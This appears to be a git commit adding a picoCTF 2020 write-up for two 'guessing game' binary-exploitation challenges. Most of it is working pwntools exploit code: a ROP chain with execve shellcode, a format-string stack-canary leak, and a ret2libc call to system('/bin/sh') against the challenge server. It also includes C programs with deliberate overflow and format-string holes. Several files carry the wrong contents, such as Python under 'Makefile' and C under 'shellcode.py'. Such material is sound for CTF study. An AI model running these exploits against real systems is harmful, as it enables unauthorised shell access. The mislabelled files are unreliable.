[writeup] add picoctf 2020 (part)

Author: onealmond

picoctf-2020/guessing-game1/Makefile

@@ -0,0 +1,5 @@
+all:
+	gcc -m64 -fno-stack-protector -O0 -no-pie -static -o vuln vuln.c
+
+clean:
+	rm vuln

picoctf-2020/guessing-game1/shellcode.py

@@ -0,0 +1,70 @@
+import os; os.environ["TMPDIR"] = os.path.join(os.environ['HOME'], 'tmp')
+import pwn
+from ctypes import CDLL
+#from struct import pack
+
+host = "jupiter.challenges.picoctf.org"
+port = 51462
+target = "./vuln"
+
+
+def must_guess(pr):
+
+    res = 0
+    while res != 1:
+      for num in range(1, 100):
+        pr.sendlineafter("What number would you like to guess?\n", str(num))
+        res = pr.readline()
+        if res != b'Nope!\n':
+            print('the num is', num, res)
+            res = 1
+            break
+
+def attack(remote):
+    pr = None
+    if remote:
+        pr = pwn.remote(host, port)
+    else:
+        pr = pwn.process(target)
+
+    try:
+        libc = CDLL('libc.so.6')
+        num = (libc.rand() % 100) + 1
+        pr.sendlineafter("What number would you like to guess?\n", str(num))
+        #must_guess(pr)
+
+        elf = pwn.ELF(target, False)
+        rop = pwn.ROP(elf)
+        payload = b'A'*120
+        payload += pwn.p64(rop.find_gadget(['pop rdx', 'ret']).address)
+        payload += pwn.p64(elf.sym['__stack_prot'])
+        payload += pwn.p64(rop.find_gadget(['pop rax', 'ret']).address)
+        payload += pwn.p64(7)                   # PROT_READ|PROT_WRITE|PROT_EXEC
+        payload += pwn.p64(0x0000000000419127)  # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln``
+                                                # 0x0000000000419127 : mov qword ptr [rdx], rax ; ret
+        payload += pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
+        payload += pwn.p64(elf.sym['__libc_stack_end'])
+        payload += pwn.p64(elf.sym['_dl_make_stack_executable'])
+        payload += pwn.p64(0x0000000000451974)  # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln``
+                                                # 0x0000000000451974 : push rsp ; ret
+
+        shellcode = b"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+        #shellcode = pwn.asm(pwn.shellcraft.i386.linux.sh())
+        payload += shellcode
+        print('payload:', payload, 'len:', len(payload))
+
+        pr.send(payload)
+        pr.readuntil("New winner!\nName? ")
+        pr.sendline()
+        print(pr.readline())
+        #pr.interactive()
+        pr.sendline("cat flag.txt;")
+        print('flag:', pr.readall(timeout=2).decode())
+
+
+    except Exception as e:
+        print(e)
+    finally:
+        pr.close()
+
+attack(True)

picoctf-2020/guessing-game1/vuln

@@ -0,0 +1,68 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+
+#define BUFSIZE 100
+
+
+long increment(long in) {
+	return in + 1;
+}
+
+long get_random() {
+	return rand() % BUFSIZE;
+}
+
+int do_stuff() {
+	long ans = get_random();
+	ans = increment(ans);
+  printf("%d\n", ans);
+	int res = 0;
+	
+	printf("What number would you like to guess?\n");
+	char guess[BUFSIZE];
+	fgets(guess, BUFSIZE, stdin);
+	
+	long g = atol(guess);
+	if (!g) {
+		printf("That's not a valid number!\n");
+	} else {
+		if (g == ans) {
+			printf("Congrats! You win! Your prize is this print statement!\n\n");
+			res = 1;
+		} else {
+			printf("Nope!\n\n");
+		}
+	}
+	return res;
+}
+
+void win() {
+	char winner[BUFSIZE];
+	printf("New winner!\nName? ");
+	fgets(winner, 360, stdin);
+	printf("Congrats %s\n\n", winner);
+}
+
+int main(int argc, char **argv){
+	setvbuf(stdout, NULL, _IONBF, 0);
+	// Set the gid to the effective gid
+	// this prevents /bin/sh from dropping the privileges
+	gid_t gid = getegid();
+	setresgid(gid, gid, gid);
+	
+	int res;
+	
+	printf("Welcome to my guessing game!\n\n");
+	
+	while (1) {
+		res = do_stuff();
+		if (res) {
+			win();
+		}
+	}
+	
+	return 0;
+}

picoctf-2020/guessing-game1/vuln.c

@@ -0,0 +1,6 @@
+all:
+	#gcc -m32 -no-pie -Wl,-z,relro,-z,now -o vuln vuln.c
+	gcc -m64 -no-pie -Wl,-z,relro,-z,now -o vuln64 vuln.c
+
+clean:
+	rm vuln

picoctf-2020/guessing-game2/Makefile

@@ -0,0 +1,97 @@
+import pwn
+from ctypes import CDLL
+#from struct import pack
+
+host = "jupiter.challenges.picoctf.org"
+port = 13775
+target = "./vuln" # https://jupiter.challenges.picoctf.org/static/119f0f0370aa220585b906b2e4a8f98b/vuln
+
+def must_guess(pr):
+    for i in range(-4096, 4096, 1):
+        if i == 0: continue
+        pr.sendlineafter("What number would you like to guess?\n", str(i))
+        res = pr.readline()
+        if 'Nope' not in res.decode():
+            print(i, res)
+            break
+    return i
+
+def test_canary(pr):
+    num = None
+    for i in range(2, 200):
+        if num is None:
+            num = must_guess(pr)
+        else:
+            pr.sendlineafter("What number would you like to guess?\n", str(num))
+        pr.readline()
+        pr.sendlineafter("New winner!\nName? ", 'XXX %{}$lx'.format(i))
+        print(i, pr.readline())
+
+def find_canary(pr, num):
+    pr.sendlineafter("What number would you like to guess?\n", str(num))
+    pr.sendlineafter("New winner!\nName? ", '%{}$lx'.format(119))
+    return int(pr.readline().decode().split(':')[1].strip(), 16)
+
+def find_symbol(pr, canary, num):
+    elf = pwn.ELF(target, False)
+    payload = b'A' * 512 + pwn.p32(canary) + b'B'*12
+    payload += pwn.p32(elf.plt['puts'])
+    payload += pwn.p32(elf.sym['win'])
+    payload += pwn.p32(elf.got['puts'])
+    pr.sendlineafter("What number would you like to guess?\n", str(num))
+    pr.sendlineafter("New winner!\nName? ", payload)
+    pr.readline()
+    pr.readline()
+    return pwn.u32(pr.readline()[:4])
+
+def get_shell(pr, canary, sys_addr, binsh_addr):
+    elf = pwn.ELF(target, False)
+    payload = b'A' * 512 + pwn.p32(canary) + b'B'*12
+    payload += pwn.p32(sys_addr)
+    payload += pwn.p32(elf.sym['win'])
+    payload += pwn.p32(binsh_addr)
+    """the rop way
+    rop = pwn.ROP(elf)
+    rop.call(sys_addr, [binsh_addr])
+    payload += rop.chain()
+    """
+    print('payload:', payload)
+    pr.sendafter("New winner!\nName? ", payload)
+    pr.sendline()
+    print(pr.readline())
+    print(pr.readline())
+    pr.sendline("cat flag.txt;")
+    print('flag:', pr.readall(timeout=2).decode())
+    #pr.interactive()
+
+def attack(remote):
+    pr = None
+    if remote:
+        pr = pwn.remote(host, port)
+    else:
+        pr = pwn.process(target)
+
+    try:
+        """find canary"""
+        num = must_guess(pr)
+        canary = find_canary(pr, num)
+        print('canary:', hex(canary))
+         
+        """find address of puts, call puts to print the address of itself"""
+        puts_addr = find_symbol(pr, canary, num)
+        print('puts @', hex(puts_addr))
+
+        """get shell"""
+        # symbol address from https://libc.blukat.me/d/libc6-i386_2.27-3ubuntu1.2_amd64.symbols
+        libc_base = puts_addr - 0x673d0
+        sys_addr = libc_base + 0x3cd80
+        binsh_addr = libc_base + 0x17bb8f
+        print('sys @', hex(sys_addr), 'binsh @', hex(binsh_addr))
+        get_shell(pr, canary, sys_addr, binsh_addr)
+
+    except Exception as e:
+        print(e)
+    finally:
+        pr.close()
+
+attack(True)

picoctf-2020/guessing-game2/shellcode.py

@@ -0,0 +1,69 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+
+#define BUFSIZE 512
+
+
+long get_random() {
+	return rand;
+}
+
+int get_version() {
+	return 2;
+}
+
+int do_stuff() {
+	long ans = (get_random() % 4096) + 1;
+	int res = 0;
+	
+	printf("What number would you like to guess?\n");
+	char guess[BUFSIZE];
+	fgets(guess, BUFSIZE, stdin);
+	
+	long g = atol(guess);
+	if (!g) {
+		printf("That's not a valid number!\n");
+	} else {
+		if (g == ans) {
+			printf("Congrats! You win! Your prize is this print statement!\n\n");
+			res = 1;
+		} else {
+			printf("Nope!\n\n");
+		}
+	}
+	return res;
+}
+
+void win() {
+	char winner[BUFSIZE];
+	printf("New winner!\nName? ");
+	gets(winner);
+	printf("Congrats: ");
+	printf(winner);
+	printf("\n\n");
+}
+
+int main(int argc, char **argv){
+	setvbuf(stdout, NULL, _IONBF, 0);
+	// Set the gid to the effective gid
+	// this prevents /bin/sh from dropping the privileges
+	gid_t gid = getegid();
+	setresgid(gid, gid, gid);
+	
+	int res;
+	
+	printf("Welcome to my guessing game!\n");
+	printf("Version: %x\n\n", get_version());
+	
+	while (1) {
+		res = do_stuff();
+		if (res) {
+			win();
+		}
+	}
+	
+	return 0;
+}